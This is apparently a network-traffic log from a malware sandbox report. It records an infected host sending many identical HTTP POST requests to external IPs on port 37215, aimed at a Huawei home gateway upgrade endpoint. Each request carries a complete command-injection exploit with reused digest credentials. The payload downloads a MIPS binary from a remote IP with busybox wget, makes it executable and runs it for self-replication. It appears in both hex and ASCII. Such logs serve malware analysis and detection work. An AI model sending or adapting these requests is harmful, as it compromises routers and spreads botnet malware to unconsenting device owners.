                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1441192.168.2.2345926157.27.67.3937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537014961 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1442192.168.2.2333980157.5.102.10137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537018061 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1443192.168.2.2347764157.194.34.12237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537024021 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1444192.168.2.2343136197.173.225.6937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537029982 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1445192.168.2.2354498197.253.200.11837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537050009 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1446192.168.2.2335830197.83.158.7337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537163019 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1447192.168.2.2347182147.156.48.22937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537178993 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1448192.168.2.2357652157.222.178.5337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537209034 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1449192.168.2.2343990197.109.173.25537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537211895 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1450192.168.2.2353652157.244.243.19037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.537214994 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
